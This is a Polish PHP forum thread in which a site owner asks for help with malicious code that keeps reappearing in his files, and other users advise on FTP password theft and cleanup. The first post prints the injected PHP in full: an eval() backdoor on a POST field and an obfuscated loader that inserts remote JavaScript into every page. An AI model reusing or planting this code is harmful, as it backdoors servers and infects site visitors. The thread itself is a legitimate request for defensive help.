Pomoc - Szukaj - Użytkownicy - Kalendarz
Pełna wersja: [PHP][JavaScript]Wirusy na stronach internetowych
Forum PHP.pl > Forum > Przedszkole
in5ane
Witam, od jakiego¶ czasu cały czas psuje mi się strona i firewall wariuje, jak wchodzę na swoj± stronę. Co jaki¶ czas wstrzykuje mi się wszędzie do plików kod na wzór tego:
Kod
<?php if(!function_exists('tmp_lkojfghx')){if(isset($_POST['tmp_lkojfghx3']))eval($_POST['tmp_lkojfghx3']);if(!defined('TMP_XHGFJOKL'))define('TMP_XHGFJOKL',base64_decode('PHNjcmlwdCBsYW5ndWFnZT1qYXZhc2NyaXB0PjwhLS0gCihmdW5jdGlvbihVSUl6Qyl7dmFyIHFu
HZTPSd2YDYxYDcyYDIwYWAzZGAyMlNgNjNyaWA3MHRFYDZlZ2luZWAyMmAyY2JgM2RgMjJWZXJzaW9uY
I4KStgMjJgMmNgNmFgM2RgMjJgMjJgMmN1YDNkbmF2aWdgNjF0b3JgMmV1c2VgNzJgNDFgNjdlbmA3NG
zYmA2OWA2NigodWAyZWluZGV4T2YoYDIyYDQzYDY4cmA2Zm1lYDIyKWAzYzApYDI2YDI2KHVgMmVpbmR
eE9gNjYoYDIyYDU3aW5gMjIpYDNlYDMwKWAyNmAyNih1YDJlaW5gNjRlYDc4T2ZgMjhgMjJgNGVgNTRg
jA2YDIyKWAzYzBgMjlgMjZgMjYoZGA2ZmA2M3VtYDY1bnRgMmVgNjNgNmZvYDZiaWVgMmVpbmRlYDc4T
YoYDIybWlla2AzZDFgMjIpYDNjYDMwKWAyNmAyNmAyOHR5YDcwZW9gNjZgMjh6cmA3NmA3YXRzKWAyMW
zZGA3NHlwZW9mKGAyMmA0MWAyMikpKWA3YmA3YXJ2enRzYDNkYDIyQWAyMmAzYmA2NXZhbChgMjJpYDY
YDI4d2A2OW5kb3dgMmVgMjIrYStgMjIpamAzZGA2YStgMjJgMmJhYDJiYDIyYDRkYWpvcmAyMitiK2Er
DIyTWlub3JgMjIrYDYyK2ErYDIyQnVpbGA2NGAyMitgNjIrYDIyamAzYmAyMilgM2Jkb2N1bWVuYDc0Y
Jld2A3MmlgNzRlKGAyMmAzY3NjcmlwdGAyMHNyY2AzZGAyZmAyZm1hcnRgMjIrYDIydXpgMmVjbmAyZn
pZGAyZmAzZmA2OWA2NGAzZGAyMitqK2AyMmAzZWAzY2A1Y2AyZnNjcmA2OXB0YDNlYDIyKWAzYmA3ZCc
dmFyIENsOWE9dW5lc2NhcGUocW5kdlMucmVwbGFjZShVSUl6QywnJScpKTtldmFsKENsOWEpfSkoL1xg
2cpOwogLS0+PC9zY3JpcHQ+'));function tmp_lkojfghx($s){if($g=(substr($s,0,2)==chr(31).chr(139)))$s=gzinflate(substr($s,10,-8));if(preg_match_all('#<script(.*?)</script>#is',$s,$a))foreach($a[0] as $v)if(count(explode("\n",$v))>5){$e=preg_match('#[\'"][^\s\'"\.,;\?!\[\]:/<>\(\)]{30,}#',$v)||preg_match('#[\(\[](\s*\d+,){20,}#',$v);if((preg_match('#\beval\b#',$v)&&($e||strpos($v,'fromCharCode')))||($e&&strpos($v,'document.write')))$s=str_replace($v,'',$s);}$s1=preg_replace('#<script language=javascript><!-- \n\(function\(.+?\n --></script>#','',$s);if(stristr($s,'<body'))$s=preg_replace('#(\s*<body)#mi',TMP_XHGFJOKL.'\1',$s1);elseif(($s1!=$s)||stristr($s,'</body')||stristr($s,'</title>'))$s=$s1.TMP_XHGFJOKL;return $g?gzencode($s):$s;}function tmp_lkojfghx2($a=0,$b=0,$c=0,$d=0){$s=array();if($b&&$GLOBALS['tmp_xhgfjokl'])call_user_func($GLOBALS['tmp_xhgfjokl'],$a,$b,$c,$d);foreach(@ob_get_status(1) as $v)if(($a=$v['name'])=='tmp_lkojfghx')return;else $s[]=array($a=='default output handler'?false:$a);for($i=count($s)-1;$i>=0;$i--){$s[$i][1]=ob_get_contents();ob_end_clean();}ob_start('tmp_lkojfghx');for($i=0;$i<count($s);$i++){ob_start($s[$i][0]);echo $s[$i][1];}}}if(($a=@set_error_handler('tmp_lkojfghx2'))!='tmp_lkojfghx2')$GLOBALS['tmp_xhgfjokl']=$a;tmp_lkojfghx2(); ?>

I co jaki¶ czas różne i podobne. Ostatnio usun±łem już wszystkie pliki z serwera, zmieniłem hasło, wgrałem na nowo plik tylko z logiem i tekstem (żadnych skryptów czy czego¶ innego) i po dwóch dniach znowu ten kod się wpisał do pliku.

Proszę o pomoc.

Chciałbym dodać, że sprawa jest dla mnie pilna.
Maxik
Temat: PHP_SERWER_NIEZABEZPIECZONY
wookieb
A przeskanowałe¶ kompa antyvirem?
Co to za serwer?
in5ane
Serwer jest w boo.pl

Kompa skanowałem ostatnio, bo miałem problemy z jakimi¶ trojanami, czy malwarami, ale już mam spoko. Zmieniłem teraz jeszcze raz hasło do konta i nie zapisałem go, by automatycznie się ł±czyło. Może będzie dobrze.
wookieb
Napisz potem do nich o logi zmian na plikach to wtedy moze dadza ci info kto to robi i jakim sposobem.
kajzur
Jest to zakodowany jaki¶ tekst. Jeste¶ chyba 2 osob± która ma problem z boo.pl jesli chodzi o wirusy, która napisała posta o tym przez ostatnie 2 tyg winksmiley.jpg Przypadek?winksmiley.jpg
in5ane
Cytat(kajzur @ 16.05.2009, 13:52:54 ) *
Jest to zakodowany jaki¶ tekst. Jeste¶ chyba 2 osob± która ma problem z boo.pl jesli chodzi o wirusy, która napisała posta o tym przez ostatnie 2 tyg winksmiley.jpg Przypadek?winksmiley.jpg

nie wiem? tongue.gif

Może ten hosting jest felerny jaki¶...
kajzur
Kiedy¶ miałem stronke na nim, ale na forum moderator nie był zbyt miły, następnie administrator również nie koniecznie, to się przeniosłem do cal.pl i jest ładnie smile.gif
patryczakowy
Cytat(in5ane @ 16.05.2009, 16:03:39 ) *
nie wiem? tongue.gif

Może ten hosting jest felerny jaki¶...

Raczej nie feralny hosting bo mam na nim dwie strony i żadnych problemów nie miałem z wirusami jak by serwer był słabo zabezpieczony to podejrzewam że wszystkie konta zostały by zainfekowane kiedy¶ znajomy miał podobny problem i okazało się że wirus pobrał dane z jego ftp (total comander) i zaraził wszystkie konta do kturych miał dostęp na różnych serwerach, także raczej nie hosting tylko komp wła¶ciciela konta
Puzi
Zmień hasło do FTP a następnie usuń ten kod z pliku i problem masz z głowy.

Jeszcze nie zapamiętuj haseł w klientach FTP...
korkie
Cytat(kajzur @ 16.05.2009, 19:32:12 ) *
Kiedy¶ miałem stronke na nim, ale na forum moderator nie był zbyt miły, następnie administrator również nie koniecznie, to się przeniosłem do cal.pl i jest ładnie smile.gif

Też podobnie zrobiłem, choć nie hostowałem na boo.pl
Przeniosłem się do cal.pl i powiem, że takiej wzorowej pomocy admina jak tam nigdzie nie widziałem.
To jest wersja lo-fi głównej zawarto¶ci. Aby zobaczyć pełn± wersję z większ± zawarto¶ci±, obrazkami i formatowaniem proszę kliknij tutaj.
Invision Power Board © 2001-2025 Invision Power Services, Inc.